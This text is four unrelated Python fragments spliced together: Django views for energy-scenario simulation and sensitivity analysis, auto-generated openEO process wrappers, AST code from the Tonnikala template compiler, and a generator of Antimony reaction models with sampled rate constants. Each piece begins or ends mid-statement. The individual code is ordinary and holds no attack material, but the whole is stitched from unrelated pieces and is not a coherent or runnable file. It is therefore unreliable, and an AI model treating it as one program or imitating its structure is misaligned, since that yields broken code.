request.method == "GET": # if a simulation object linked to this scenario exists, all steps have been already fullfilled if qs_sim.exists(): max_step = 5 # prepare the forms for each constraint unbound_forms = {} for constraint_type, constraint_form in constraints_forms.items(): # check whether the constraint is already associated to the scenario qs = constraints_models[constraint_type].objects.filter(scenario=scenario) if qs.exists(): unbound_forms[constraint_type] = constraint_form( prefix=constraint_type, instance=qs[0] ) else: unbound_forms[constraint_type] = constraint_form(prefix=constraint_type) return render( request, f"scenario/scenario_step{step_id}.html", { "scenario": scenario, "scen_id": scen_id, "proj_id": scenario.project.id, "proj_name": scenario.project.name, "step_id": step_id, "step_list": STEP_LIST, "max_step": max_step, "forms": unbound_forms, "forms_labels": constraints_labels, }, ) elif request.method == "POST": for constraint_type, form_model in constraints_forms.items(): form = form_model(request.POST, prefix=constraint_type) if form.is_valid(): # check whether the constraint is already associated to the scenario qs = constraints_models[constraint_type].objects.filter( scenario=scenario ) if qs.exists(): if len(qs) == 1: constraint_instance = qs[0] for name, value in form.cleaned_data.items(): if getattr(constraint_instance, name) != value: setattr(constraint_instance, name, value) if qs_sim.exists(): qs_sim.update(status=MODIFIED) else: constraint_instance = form.save(commit=False) constraint_instance.scenario = scenario if constraint_type == "net_zero_energy": constraint_instance.value = constraint_instance.activated constraint_instance.save() return HttpResponseRedirect(reverse("scenario_review", args=[proj_id, scen_id])) @login_required @require_http_methods(["GET", "POST"]) def scenario_review(request, proj_id, scen_id, step_id=4, max_step=5): scenario = get_object_or_404(Scenario, pk=scen_id) if (scenario.project.user != request.user) 
and ( request.user not in scenario.project.viewers.all() ): raise PermissionDenied if request.method == "GET": html_template = f"scenario/simulation/no-status.html" context = { "scenario": scenario, "scen_id": scen_id, "proj_id": scenario.project.id, "proj_name": scenario.project.name, "step_id": step_id, "step_list": STEP_LIST, "max_step": max_step, "MVS_GET_URL": MVS_GET_URL, "MVS_LP_FILE_URL": MVS_LP_FILE_URL, } qs = Simulation.objects.filter(scenario_id=scen_id) if qs.exists(): simulation = qs.first() if simulation.status == PENDING: fetch_mvs_simulation_results(simulation) context.update( { "sim_id": simulation.id, "simulation_status": simulation.status, "secondsElapsed": simulation.elapsed_seconds, "rating": simulation.user_rating, "mvs_token": simulation.mvs_token, } ) if simulation.status == ERROR: context.update({"simulation_error_msg": simulation.errors}) html_template = "scenario/simulation/error.html" elif simulation.status == PENDING: html_template = "scenario/simulation/pending.html" elif simulation.status == DONE: html_template = "scenario/simulation/success.html" else: print("no simulation existing") return render(request, html_template, context) @login_required @require_http_methods(["GET"]) def back_to_scenario_review(request, proj_id): selected_scenario = get_selected_scenarios_in_cache(request, proj_id) if len(selected_scenario) >= 1: scen_id = selected_scenario[0] answer = scenario_review(request, proj_id, scen_id) else: messages.error( request, _( "No scenario was available in the cache, try refreshing the page and make sure one scenario is selected." 
), ) answer = HttpResponseRedirect(request.headers.get("Referer")) return answer SCENARIOS_STEPS = [ scenario_create_parameters, scenario_create_topology, scenario_create_constraints, scenario_review, ] @login_required @require_http_methods(["GET"]) def scenario_steps(request, proj_id, step_id=None, scen_id=None): if request.method == "GET": if step_id is None: return HttpResponseRedirect(reverse("scenario_steps", args=[proj_id, 1])) return SCENARIOS_STEPS[step_id - 1](request, proj_id, scen_id, step_id) # TODO delete this useless code here @login_required @require_http_methods(["GET"]) def scenario_view(request, scen_id, step_id): """Scenario View. GET request only.""" scenario = get_object_or_404(Scenario, pk=scen_id) if (scenario.project.user != request.user) and ( request.user not in scenario.project.viewers.all() ): raise PermissionDenied return HttpResponseRedirect(reverse("project_search", args=[scenario.project.id])) # TODO delete this useless code here @login_required @require_http_methods(["GET"]) def scenario_update(request, scen_id, step_id): """Scenario Update View. 
POST request only.""" scenario = get_object_or_404(Scenario, pk=scen_id) if scenario.project.user != request.user: raise PermissionDenied if request.POST: form = ScenarioUpdateForm(request.POST) if form.is_valid(): [ setattr(scenario, name, value) for name, value in form.cleaned_data.items() ] scenario.save(update_fields=form.cleaned_data.keys()) return HttpResponseRedirect( reverse("project_search", args=[scenario.project.id]) ) else: raise Http404("An error occurred while updating the Scenario.") @login_required @require_http_methods(["GET"]) def scenario_duplicate(request, scen_id): """duplicates the selected scenario and all of its associated components (topology data included)""" scenario = get_object_or_404(Scenario, pk=scen_id) if scenario.project.user != request.user: raise PermissionDenied # We need to iterate over all the objects related to this scenario and duplicate them # and associate them with the new scenario id. asset_list = Asset.objects.filter(scenario=scenario) bus_list = Bus.objects.filter(scenario=scenario) connections_list = ConnectionLink.objects.filter(scenario=scenario) # simulation_list = Simulation.objects.filter(scenario=scenario) # first duplicate the scenario scenario.pk = None scenario.save() # from now on we are working with the duplicated scenario, not the original old2new_asset_ids_map = duplicate_scenario_objects(asset_list, scenario) old2new_bus_ids_map = duplicate_scenario_objects( bus_list, scenario, old2new_asset_ids_map ) duplicate_scenario_connections( connections_list, scenario, old2new_asset_ids_map, old2new_bus_ids_map ) # duplicate_scenario_objects(simulation_list, scenario) return HttpResponseRedirect(reverse("project_search", args=[scenario.project.id])) @login_required @require_http_methods(["POST"]) def scenario_export(request, proj_id): response = HttpResponseRedirect(reverse("project_search", args=[proj_id])) # get the selected scenarios under the project view and export them into a file scenario_ids = 
request.POST.get("scenario_ids") if scenario_ids is not None: scenario_ids = json.loads(scenario_ids) scenario_data = [] for scen_id in scenario_ids: scenario = get_object_or_404(Scenario, id=int(scen_id)) scenario_data.append(scenario.export(bind_project_data=True)) response = HttpResponse( json.dumps(scenario_data), content_type="application/json" ) response["Content-Disposition"] = "attachment; filename=scenario.json" return response @login_required @require_http_methods(["POST"]) def scenario_delete(request, scen_id): scenario = get_object_or_404(Scenario, id=scen_id) if scenario.project.user != request.user: logger.warning( f"Unauthorized user tried to delete project scenario with db id = {scen_id}." ) raise PermissionDenied if request.POST: scenario.delete() messages.success(request, "scenario successfully deleted!") return HttpResponseRedirect( reverse("project_search", args=[scenario.project.id]) ) # endregion Scenario @login_required @require_http_methods(["GET", "POST"]) def sensitivity_analysis_create(request, scen_id, sa_id=None, step_id=5): excuses_design_under_development(request) scenario = get_object_or_404(Scenario, id=scen_id) if scenario.project.user != request.user: raise PermissionDenied if request.method == "GET": if sa_id is not None: sa_item = get_object_or_404(SensitivityAnalysis, id=sa_id) sa_form = SensitivityAnalysisForm(scen_id=scen_id, instance=sa_item) sa_status = sa_item.status mvs_token = sa_item.mvs_token else: number_existing_sa = scenario.sensitivityanalysis_set.all().count() sa_item = None sa_status = None mvs_token = None sa_form = SensitivityAnalysisForm( scen_id=scen_id, initial={"name": f"sensitivity_analysis_{number_existing_sa + 1}"}, ) answer = render( request, "scenario/sensitivity_analysis.html", { "proj_id": scenario.project.id, "proj_name": scenario.project.name, "scenario": scenario, "scen_id": scen_id, "step_id": step_id, "step_list": STEP_LIST + [_("Sensitivity analysis")], "max_step": 5, "MVS_SA_GET_URL": 
MVS_SA_GET_URL, "sa_form": sa_form, "sa_status": sa_status, "sa_id": sa_id, "mvs_token": mvs_token, }, ) if request.method == "POST": qs = request.POST sa_form = SensitivityAnalysisForm(qs) if sa_form.is_valid(): sa_item = sa_form.save(commit=False) # TODO if the reference value is not the same as in the current scenario, duplicate the scenario and bind the duplicate to sa_item # TODO check if the scenario is already bound to a SA sa_item.set_reference_scenario(scenario) try: data_clean = format_scenario_for_mvs(scenario) except Exception as e: error_msg = f"Scenario Serialization ERROR! User: {scenario.project.user.username}. Scenario Id: {scenario.id}. Thrown Exception: {e}." logger.error(error_msg) messages.error(request, error_msg) answer = JsonResponse( {"error": f"Scenario Serialization ERROR! Thrown Exception: {e}."}, status=500, content_type="application/json", ) sa_item.save() # Add the information about the sensitivity analysis to the json data_clean.update(sa_item.payload) # Make simulation request to MVS response = mvs_sensitivity_analysis_request(data_clean) if response is None: error_msg = "Could not communicate with the simulation server." logger.error(error_msg) messages.error(request, error_msg) # TODO redirect to prefilled feedback form / bug form answer = JsonResponse( {"status": "error", "error": error_msg}, status=407, content_type="application/json", ) else: sa_item.mvs_token = response["id"] if response["id"] else None # import pdb; pdb.set_trace() # sa_item.parse_server_response(response) if "status" in response.keys() and ( response["status"] == DONE or response["status"] == ERROR ): # TODO call method to fetch response here sa_item.status
    the suffix `_meta`. The new dimension has the dimension labels `total_count` and `valid_count`.
    """
    return _process('aggregate_spatial', data=data, geometries=geometries, reducer=reducer, target_dimension=target_dimension, context=context)


# NOTE(review): these wrappers appear auto-generated from the openEO process
# specifications; docstrings mirror the upstream process descriptions.
def aggregate_spatial_binary(data, geometries, reducer, target_dimension=UNSET, context=UNSET) -> ProcessBuilder:
    """
    Zonal statistics for geometries by binary aggregation

    :param data: A raster data cube. The data cube implicitly gets restricted to the bounds of the geometries
        as if ``filter_spatial()`` would have been used with the same values for the corresponding parameters
        immediately before this process.
    :param geometries: Geometries as GeoJSON on which the aggregation will be based.
    :param reducer: A reduction operator to be applied consecutively on tuples of values. It must be both
        associative and commutative as the execution may be executed in parallel and therefore the order of
        execution is arbitrary. The reduction operator may be a single process such as ``multiply()`` or
        consist of multiple sub-processes.
    :param target_dimension: The new dimension name to be used for storing the results. Defaults to `result`.
    :param context: Additional data to be passed to the reducer.

    :return: A vector data cube with the computed results and restricted to the bounds of the geometries. The
        computed value is stored in dimension with the name that was specified in the parameter
        `target_dimension`. The computation also stores information about the total count of pixels (valid +
        invalid pixels) and the number of valid pixels (see ``is_valid()``) for each geometry. These values are
        stored as new dimension with a dimension name derived from `target_dimension` by adding the suffix
        `_meta`. The new dimension has the dimension labels `total_count` and `valid_count`.
    """
    return _process('aggregate_spatial_binary', data=data, geometries=geometries, reducer=reducer, target_dimension=target_dimension, context=context)


def aggregate_spatial_window(data, reducer, size, boundary=UNSET, align=UNSET, context=UNSET) -> ProcessBuilder:
    """
    Zonal statistics for rectangular windows

    :param data: A raster data cube with exactly two horizontal spatial dimensions and an arbitrary number of
        additional dimensions. The process is applied to all additional dimensions individually.
    :param reducer: A reducer to be applied on the list of values, which contain all pixels covered by the
        window. A reducer is a single process such as ``mean()`` or a set of processes, which computes a single
        value for a list of values, see the category 'reducer' for such processes.
    :param size: Window size in pixels along the horizontal spatial dimensions. The first value corresponds to
        the `x` axis, the second value corresponds to the `y` axis.
    :param boundary: Behavior to apply if the number of values for the axes `x` and `y` is not a multiple of the
        corresponding value in the `size` parameter. Options are: - `pad` (default): pad the data cube with the
        no-data value `null` to fit the required window size. - `trim`: trim the data cube to fit the required
        window size. Set the parameter `align` to specifies to which corner the data is aligned to.
    :param align: If the data requires padding or trimming (see parameter `boundary`), specifies to which corner
        of the spatial extent the data is aligned to. For example, if the data is aligned to the upper left, the
        process pads/trims at the lower-right.
    :param context: Additional data to be passed to the reducer.

    :return: A data cube with the newly computed values and the same dimensions. The resolution will change
        depending on the chosen values for the `size` and `boundary` parameter. It usually decreases for the
        dimensions which have the corresponding parameter `size` set to values greater than 1. The dimension
        labels will be set to the coordinate at the center of the window. The other dimension properties (name,
        type and reference system) remain unchanged.
    """
    return _process('aggregate_spatial_window', data=data, reducer=reducer, size=size, boundary=boundary, align=align, context=context)


def aggregate_temporal(data, intervals, reducer, labels=UNSET, dimension=UNSET, context=UNSET) -> ProcessBuilder:
    """
    Temporal aggregations

    :param data: A data cube.
    :param intervals: Left-closed temporal intervals, which are allowed to overlap. Each temporal interval in
        the array has exactly two elements:  1. The first element is the start of the temporal interval. The
        specified instance in time is **included** in the interval.  2. The second element is the end of the
        temporal interval. The specified instance in time is **excluded** from the interval.  The specified
        temporal strings follow [RFC 3339](https://www.rfc-editor.org/rfc/rfc3339.html). Although [RFC 3339
        prohibits the hour to be '24'](https://www.rfc-editor.org/rfc/rfc3339.html#section-5.7), **this process
        allows the value '24' for the hour** of an end time in order to make it possible that left-closed time
        intervals can fully cover the day.
    :param reducer: A reducer to be applied for the values contained in each interval. A reducer is a single
        process such as ``mean()`` or a set of processes, which computes a single value for a list of values,
        see the category 'reducer' for such processes. Intervals may not contain any values, which for most
        reducers leads to no-data (`null`) values by default.
    :param labels: Distinct labels for the intervals, which can contain dates and/or times. Is only required to
        be specified if the values for the start of the temporal intervals are not distinct and thus the default
        labels would not be unique. The number of labels and the number of groups need to be equal.
    :param dimension: The name of the temporal dimension for aggregation.
All data along the dimension is passed through the specified reducer. If the dimension is not set or set to `null`, the data cube is expected to only have one temporal dimension. Fails with a `TooManyDimensions` exception if it has more dimensions. Fails with a `DimensionNotAvailable` exception if the specified dimension does not exist. :param context: Additional data to be passed to the reducer. :return: A new data cube with the same dimensions. The dimension properties (name, type, labels, reference system and resolution) remain unchanged, except for the resolution and dimension labels of the given temporal dimension. """ return _process('aggregate_temporal', data=data, intervals=intervals, reducer=reducer, labels=labels, dimension=dimension, context=context) def aggregate_temporal_period(data, period, reducer, dimension=UNSET, context=UNSET) -> ProcessBuilder: """ Temporal aggregations based on calendar hierarchies :param data: A data cube. :param period: The time intervals to aggregate. The following pre-defined values are available: * `hour`: Hour of the day * `day`: Day of the year * `week`: Week of the year * `dekad`: Ten day periods, counted per year with three periods per month (day 1 - 10, 11 - 20 and 21 - end of month). The third dekad of the month can range from 8 to 11 days. For example, the fourth dekad is Feb, 1 - Feb, 10 each year. * `month`: Month of the year * `season`: Three month periods of the calendar seasons (December - February, March - May, June - August, September - November). * `tropical-season`: Six month periods of the tropical seasons (November - April, May - October). * `year`: Proleptic years * `decade`: Ten year periods ([0-to-9 decade](https://en.wikipedia.org/wiki/Decade#0-to-9_decade)), from a year ending in a 0 to the next year ending in a 9. 
* `decade-ad`: Ten year periods ([1-to-0 decade](https://en.wikipedia.org/wiki/Decade#1-to-0_decade)) better aligned with the anno Domini (AD) calendar era, from a year ending in a 1 to the next year ending in a 0. :param reducer: A reducer to be applied for the values contained in each period. A reducer is a single process such as ``mean()`` or a set of processes, which computes a single value for a list of values, see the category 'reducer' for such processes. Periods may not contain any values, which for most reducers leads to no-data (`null`) values by default. :param dimension: The name of the temporal dimension for aggregation. All data along the dimension is passed through the specified reducer. If the dimension is not set or set to `null`, the data cube is expected to only have one temporal dimension. Fails with a `TooManyDimensions` exception if it has more dimensions. Fails with a `DimensionNotAvailable` exception if the specified dimension does not exist. :param context: Additional data to be passed to the reducer. :return: A
<reponame>tetframework/Tonnikala import ast from ast import * from collections.abc import Iterable from .astalyzer import FreeVarFinder from ..base import LanguageNode, ComplexNode, BaseGenerator from ...helpers import StringWithLocation from ...runtime.debug import TemplateSyntaxError import sys try: # pragma: no cover import sysconfig HAS_ASSERT = bool(sysconfig.get_config_var('Py_DEBUG')) del sysconfig except ImportError: # pragma: no cover HAS_ASSERT = False name_counter = 0 ALWAYS_BUILTINS = ''' False True None '''.split() def simple_call(func, args=None): return Call(func=func, args=args or [], keywords=[], starargs=None, kwargs=None) def create_argument_list(arguments): return [arg(arg=id, annotation=None) for id in arguments] def simple_function_def(name, arguments=()): arguments = create_argument_list(arguments) if sys.version_info >= (3, 8): extra = {'posonlyargs': []} else: extra = {} return FunctionDef( name=name, args=ast.arguments( args=arguments, vararg=None, varargannotation=None, kwonlyargs=[], kwarg=None, kwargannotation=None, defaults=[], kw_defaults=[], **extra ), body=[Pass()], decorator_list=[], returns=None ) def NameX(id, store=False): return Name(id=id, ctx=Load() if not store else Store()) def adjust_locations(ast_node, first_lineno, first_offset): """ Adjust the locations of the ast nodes, offsetting them to the new lineno and column offset """ line_delta = first_lineno - 1 def _fix(node): if 'lineno' in node._attributes: lineno = node.lineno col = node.col_offset # adjust the offset on the first line if lineno == 1: col += first_offset lineno += line_delta node.lineno = lineno node.col_offset = col for child in iter_child_nodes(node): _fix(child) _fix(ast_node) def get_fragment_ast(expression, mode='eval', adjust=(0, 0)): if not isinstance(expression, str): return expression position = getattr(expression, 'position', (1, 0)) position = position[0] + adjust[0], position[1] + adjust[1] tree = None t = None try: exp = expression if 
expression[-1:] != '\n': exp = expression + '\n' tree = ast.parse(exp, mode=mode) except SyntaxError as e: lineno = e.lineno lineno += position[0] - 1 t = TemplateSyntaxError(e.msg, lineno=lineno) if tree is None: raise t adjust_locations(tree, position[0], position[1]) return tree.body def gen_name(typename=None): global name_counter name_counter += 1 if typename: return "__TK__typed__%s__%d__" % (typename, name_counter) else: return "__TK_%d__" % (name_counter) def static_eval(expr): if isinstance(expr, UnaryOp) and isinstance(expr.op, Not): return not static_eval(expr.operand) return literal_eval(expr) def static_expr_to_bool(expr): try: return bool(static_eval(expr)) except: return None class PythonNode(LanguageNode): is_top_level = False def generate_output_ast(self, code, generator, parent, escape=False, position=None): func = Name(id='__TK__output', ctx=Load()) if not isinstance(code, list): code = [code] rv = [] for i in code: if position is not None: i.lineno, i.col_offset = position e = Expr(simple_call(func, [i])) e.output_args = [i] rv.append(e) return rv def make_buffer_frame(self, body): new_body = [] new_body.append(Assign( targets=[ NameX('__TK__output', store=True), ], value=simple_call( NameX('__TK__mkbuffer') ) )) new_body.extend(body) new_body.append(Return(value=NameX('__TK__output'))) return new_body def make_function(self, name, body, add_buffer=False, arguments=()): # ensure that the function name is an str func = simple_function_def(str(name), arguments=arguments) new_body = func.body = [] if add_buffer: new_body.extend(self.make_buffer_frame(body)) else: new_body.extend(body) if not new_body: new_body.append(Pass()) return func def generate_varscope(self, body): name = gen_name('variable_scope') rv = [ self.make_function(name, body, arguments=['__TK__output', '__TK__escape']), Expr(simple_call(NameX(name), [NameX('__TK__output'), NameX('__TK__escape')])) ] return rv class PyOutputNode(PythonNode): def __init__(self, text): 
super(PyOutputNode, self).__init__() self.text = text def get_expressions(self): return [self.get_expression()] def get_expression(self): return Str(s=self.text) def generate_ast(self, generator, parent): return self.generate_output_ast(self.get_expression(), generator, parent) class PyTranslatableOutputNode(PyOutputNode): def __init__(self, text, needs_escape=False): super(PyTranslatableOutputNode, self).__init__(text) self.needs_escape = needs_escape def get_expressions(self): return [self.get_expression()] def get_expression(self): name = 'gettext' if self.needs_escape: name = 'egettext' expr = simple_call( NameX(name), [Str(s=self.text)], ) return expr class PyExpressionNode(PythonNode): def __init__(self, expression): super(PyExpressionNode, self).__init__() self.expr = expression def get_expressions(self): return [self.get_expression()] def get_expression(self): return simple_call( NameX('__TK__escape'), [self.get_unescaped_expression()] ) def get_unescaped_expression(self): return get_fragment_ast(self.expr) def generate_ast(self, generator, parent): return self.generate_output_ast(self.get_expression(), generator, parent) class PyCodeNode(PythonNode): def __init__(self, source): super(PyCodeNode, self).__init__() self.source = source def generate_ast(self, generator, parent): return get_fragment_ast(self.source, mode='exec') def coalesce_strings(args): rv = [] str_on = None for i in args: if isinstance(i, Str): if str_on: str_on.s += i.s continue str_on = i else: str_on = None rv.append(i) return rv class PyComplexNode(ComplexNode, PythonNode): def generate_child_ast(self, generator, parent_for_children): rv = [] for i in self.children: rv.extend(i.generate_ast(generator, parent_for_children)) return rv class PyIfNode(PyComplexNode): def __init__(self, expression): super(PyIfNode, self).__init__() self.expression = expression def generate_ast(self, generator, parent): test = get_fragment_ast(self.expression) boolean = static_expr_to_bool(test) if boolean == 
False: return [] if boolean == True: return self.generate_child_ast(generator, parent) node = If( test=test, body=self.generate_child_ast(generator, self), orelse=[] ) return [node] def PyUnlessNode(self, expression): expression = get_fragment_ast(expression) expression = UnaryOp(op=Not(), operand=expression) return PyIfNode(expression) class PyImportNode(PythonNode): def __init__(self, href, alias): super(PyImportNode, self).__init__() self.href = str(href) self.alias = str(alias) def generate_ast(self, generator, parent): node = Assign( targets=[NameX(str(self.alias), store=True)], value= simple_call( func= Attribute(value=NameX('__TK__runtime', store=False), attr='import_defs', ctx=Load()), args=[ NameX('__TK__original_context'), Str(s=self.href) ] ) ) if parent.is_top_level: generator.add_top_level_import(str(self.alias), node) return [] return [node] class PyAttributeNode(PyComplexNode): def __init__(self, name, value): super(PyAttributeNode, self).__init__() self.name = name def get_expressions(self): rv = [] for i in self.children: rv.extend(i.get_expressions()) return rv def generate_ast(self, generator, parent): if len(self.children) == 1 and \ isinstance(self.children[0], PyExpressionNode): # special case, the attribute contains a single # expression, these are handled by # __TK__output.output_boolean_attr, # given the name, and unescaped expression! 
return [Expr(simple_call( func=Attribute( value=NameX('__TK__output'), attr='output_boolean_attr', ctx=Load() ), args=[ Str(s=self.name), self.children[0].get_unescaped_expression() ] ))] # otherwise just return the output for the attribute code # like before return self.generate_output_ast( [Str(s=' %s="' % self.name)] + self.get_expressions() + [Str(s='"')], generator, parent ) class PyAttrsNode(PythonNode): def __init__(self, expression): super(PyAttrsNode, self).__init__() self.expression = expression def generate_ast(self, generator, parent): expression = get_fragment_ast(self.expression) output = simple_call( NameX('__TK__output_attrs'), args=[expression] ) return self.generate_output_ast(output, generator, parent) class PyForNode(PyComplexNode): def __init__(self, target_and_expression, parts): super(PyForNode, self).__init__() self.target_and_expression = target_and_expression def generate_contents(self, generator, parent): lineno, col = getattr(self.target_and_expression, 'position', (1, 0)) body = get_fragment_ast( StringWithLocation('for %s: pass' % self.target_and_expression, lineno, col - 4), 'exec', ) for_node = body[0] for_node.body = self.generate_child_ast(generator, self) return [for_node] def generate_ast(self, generator, parent): # TODO: this could be needed to be reinstantiated # return self.generate_varscope(self.generate_contents()) return self.generate_contents(generator, parent) class PyDefineNode(PyComplexNode): def __init__(self, funcspec): super(PyDefineNode, self).__init__() self.position = getattr(funcspec, 'position', (1, 0)) if '(' not in funcspec: funcspec += '()' self.funcspec = funcspec def generate_ast(self, generator, parent): body = get_fragment_ast( StringWithLocation('def %s: pass' % self.funcspec, self.position[0], self.position[1] - 4), "exec" ) def_node = body[0] name = self.funcspec.partition('(')[0] def_node.body = self.make_buffer_frame( self.generate_child_ast(generator, self) ) # move the function out of the closure 
if parent.is_top_level: generator.add_top_def(def_node.name, def_node) return [] return [def_node] class PyComplexExprNode(PyComplexNode): def get_expressions(self): rv = [] for i in self.children: if hasattr(i, 'get_expression'): rv.append(i.get_expression()) else: rv.extend(i.get_expressions()) return rv def generate_ast(self, generator, parent=None): return self.generate_output_ast(self.get_expressions(), generator, parent) class PyBlockNode(PyComplexNode): def __init__(self, name): super(PyBlockNode, self).__init__() self.name = name def generate_ast(self, generator, parent): is_extended = isinstance(parent, PyExtendsNode) name = self.name blockfunc_name = '__TK__block__%s' % name position = getattr(name, 'position', (1, 0)) body = get_fragment_ast( StringWithLocation( 'def %s():pass' % blockfunc_name, position[0], position[1] - 4), 'exec' ) def_node = body[0] def_node.body = self.make_buffer_frame( self.generate_child_ast(generator, self) ) if not isinstance(name, str): # pragma: python2 name = name.encode('UTF-8') generator.add_block(str(name), def_node, blockfunc_name) if not is_extended: # call the block in place return self.generate_output_ast( [simple_call(NameX(str(self.name)), [])], self, parent, position=position ) else: return [] class PyWithNode(PyComplexNode): def __init__(self, vars): super(PyWithNode, self).__init__() self.vars = vars def generate_ast(self, generator, parent=None): var_defs = get_fragment_ast(self.vars, 'exec') body = var_defs + self.generate_child_ast(generator, self) return self.generate_varscope(body) class PyExtendsNode(PyComplexNode): is_top_level = True def __init__(self, href): super(PyExtendsNode, self).__init__() self.href = href def generate_ast(self, generator, parent=None): generator.make_extended_template(self.href) return self.generate_child_ast(generator, self) def ast_equals(tree1, tree2): x1 = ast.dump(tree1) x2 = ast.dump(tree2) return x1 == x2 def coalesce_outputs(tree): """ Coalesce the constant output 
    expressions

        __output__('foo')
        __output__('bar')
        __output__(baz)
        __output__('xyzzy')

    into

        __output__('foobar', baz, 'xyzzy')
    """
    coalesce_all_outputs = True
    if coalesce_all_outputs:
        # merge every output statement, whatever its argument type
        should_coalesce = lambda n: True
    else:
        # alternative policy: merge only constant-string outputs
        should_coalesce = lambda n: n.output_args[0].__class__ is Str

    class OutputCoalescer(NodeVisitor):
        def visit(self, node):
            # if - else expression also has a body! it is not we want, though.
            if hasattr(node, 'body') and isinstance(node.body, Iterable):
                # coalesce continuous string output nodes
                new_body = []
                output_node = None

                def coalesce_strs():
                    # fold adjacent Str arguments of the pending output
                    # call into single Str nodes
                    if output_node:
                        output_node.value.args[:] = \
                            coalesce_strings(output_node.value.args)

                for i in node.body:
                    if hasattr(i, 'output_args') and should_coalesce(i):
                        if output_node:
                            # NOTE(review): 250 presumably keeps the call under
                            # CPython's historical 255-argument limit — confirm
                            if len(output_node.value.args) + len(i.output_args) > 250:
                                coalesce_strs()
                                output_node = i
                            else:
                                # merged into the pending call; drop statement
                                output_node.value.args.extend(i.output_args)
                                continue

                        output_node = i
                    else:
                        # a non-output statement ends the current run
                        coalesce_strs()
                        output_node = None

                    new_body.append(i)

                coalesce_strs()
                node.body[:] = new_body

            NodeVisitor.visit(self, node)

        def check(self, node):
            """
            Coalesce __TK__output(__TK__escape(literal(x))) into
            __TK__output(x).
            """
            if not ast_equals(node.func, NameX('__TK__output')):
                return

            for i in range(len(node.args)):
                arg1 = node.args[i]
                if not arg1.__class__.__name__ == 'Call':
                    continue

                if not ast_equals(arg1.func, NameX('__TK__escape')):
                    continue

                if len(arg1.args) != 1:
                    continue

                arg2 = arg1.args[0]
                if not arg2.__class__.__name__ == 'Call':
                    continue

                if not ast_equals(arg2.func, NameX('literal')):
                    continue

                if len(arg2.args) != 1:
                    continue

                node.args[i] = arg2.args[0]

        def visit_Call(self, node):
            self.check(node)
            self.generic_visit(node)

    OutputCoalescer().visit(tree)


def remove_locations(node):
    """
    Removes locations from the given AST tree completely
    """
    def
+= '\n' parameter_index = None if 'deg' in kinetics[2]: reaction_index += 1 parameter_index = reaction_index for sp in floating_ids: ant_str += 'J' + str(reaction_index) + ': S' + str(sp) + ' ->; ' + 'k' + str(reaction_index) + '*' \ + 'S' + str(sp) + '\n' reaction_index += 1 ant_str += '\n' ro = list(ro) ro.sort() if kinetics[1] == 'trivial': for each in ro: ant_str += each + ' = ' + str(1) + '\n' else: for each in ro: ant_str += each + ' = ' + str(uniform.rvs(loc=0, scale=1)) + '\n' ant_str += '\n' kf = list(kf) kf.sort() for each in kf: if kinetics[1] == 'trivial': ant_str += each + ' = 1\n' if kinetics[1] == 'uniform': const = uniform.rvs(loc=kinetics[3][kinetics[2].index('kf')][0], scale=kinetics[3][kinetics[2].index('kf')][1] - kinetics[3][kinetics[2].index('kf')][0]) ant_str += each + ' = ' + str(const) + '\n' if kinetics[1] == 'loguniform': const = loguniform.rvs(kinetics[3][kinetics[2].index('kf')][0], kinetics[3][kinetics[2].index('kf')][1]) ant_str += each + ' = ' + str(const) + '\n' if kinetics[1] == 'normal': while True: const = norm.rvs(loc=kinetics[3][kinetics[2].index('kf')][0], scale=kinetics[3][kinetics[2].index('kf')][1]) if const >= 0: ant_str += each + ' = ' + str(const) + '\n' break if kinetics[1] == 'lognormal': const = lognorm.rvs(scale=kinetics[3][kinetics[2].index('kf')][0], s=kinetics[3][kinetics[2].index('kf')][1]) ant_str += each + ' = ' + str(const) + '\n' if kf: ant_str += '\n' kr = list(kr) kr.sort() for each in kr: if kinetics[1] == 'trivial': ant_str += each + ' = 1\n' if kinetics[1] == 'uniform': const = uniform.rvs(loc=kinetics[3][kinetics[2].index('kr')][0], scale=kinetics[3][kinetics[2].index('kr')][1] - kinetics[3][kinetics[2].index('kr')][0]) ant_str += each + ' = ' + str(const) + '\n' if kinetics[1] == 'loguniform': const = loguniform.rvs(kinetics[3][kinetics[2].index('kr')][0], kinetics[3][kinetics[2].index('kr')][1]) ant_str += each + ' = ' + str(const) + '\n' if kinetics[1] == 'normal': while True: const = 
norm.rvs(loc=kinetics[3][kinetics[2].index('kr')][0], scale=kinetics[3][kinetics[2].index('kr')][1]) if const >= 0: ant_str += each + ' = ' + str(const) + '\n' break if kinetics[1] == 'lognormal': const = lognorm.rvs(scale=kinetics[3][kinetics[2].index('kr')][0], s=kinetics[3][kinetics[2].index('kr')][1]) ant_str += each + ' = ' + str(const) + '\n' if kr: ant_str += '\n' km = list(km) km.sort() for each in km: if kinetics[1] == 'trivial': ant_str += each + ' = 1\n' if kinetics[1] == 'uniform': const = uniform.rvs(loc=kinetics[3][kinetics[2].index('km')][0], scale=kinetics[3][kinetics[2].index('km')][1] - kinetics[3][kinetics[2].index('km')][0]) ant_str += each + ' = ' + str(const) + '\n' if kinetics[1] == 'loguniform': const = loguniform.rvs(kinetics[3][kinetics[2].index('km')][0], kinetics[3][kinetics[2].index('km')][1]) ant_str += each + ' = ' + str(const) + '\n' if kinetics[1] == 'normal': while True: const = norm.rvs(loc=kinetics[3][kinetics[2].index('km')][0], scale=kinetics[3][kinetics[2].index('km')][1]) if const >= 0: ant_str += each + ' = ' + str(const) + '\n' break if kinetics[1] == 'lognormal': const = lognorm.rvs(scale=kinetics[3][kinetics[2].index('km')][0], s=kinetics[3][kinetics[2].index('km')][1]) ant_str += each + ' = ' + str(const) + '\n' if km: ant_str += '\n' kma = list(kma) kma.sort() for each in kma: if kinetics[1] == 'trivial': ant_str += each + ' = 1\n' if kinetics[1] == 'uniform': const = uniform.rvs(loc=kinetics[3][kinetics[2].index('km')][0], scale=kinetics[3][kinetics[2].index('km')][1] - kinetics[3][kinetics[2].index('km')][0]) ant_str += each + ' = ' + str(const) + '\n' if kinetics[1] == 'loguniform': const = loguniform.rvs(kinetics[3][kinetics[2].index('km')][0], kinetics[3][kinetics[2].index('km')][1]) ant_str += each + ' = ' + str(const) + '\n' if kinetics[1] == 'normal': while True: const = norm.rvs(loc=kinetics[3][kinetics[2].index('km')][0], scale=kinetics[3][kinetics[2].index('km')][1]) if const >= 0: ant_str += each + ' = ' + 
